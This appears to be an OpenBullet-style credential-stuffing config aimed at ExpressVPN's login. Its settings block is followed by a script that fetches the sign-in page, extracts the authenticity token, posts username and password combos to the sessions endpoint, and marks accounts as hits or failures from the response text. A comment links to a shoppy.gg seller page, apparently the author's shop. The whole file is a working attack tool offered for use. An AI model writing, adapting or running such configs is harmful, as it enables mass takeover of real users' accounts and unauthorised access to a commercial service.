[SETTINGS]
{
  "Name": "express vpn ",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-02T09:06:58.281564-07:00",
  "AdditionalInfo": "",
  "Author": "Dr.Amr ",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#https://shoppy.gg/@Dr_Amr_Abo_Eleni REQUEST GET "https://www.expressvpn.net/sign-in" 
  
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Origin: https://www.expressvpn.net" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 

#Dr.Amr_ PARSE "<SOURCE>" LR "\"authenticity_token\" value=\"" "\"" EncodeOutput=TRUE -> VAR "authenticity_token" 

#More_is_ REQUEST POST "https://www.expressvpn.net/sessions" 
  CONTENT "utf8=%E2%9C%93&authenticity_token=<authenticity_token>&email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Comming_:D KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password." 
  KEYCHAIN Success OR 
    KEY "\">Verification code" 

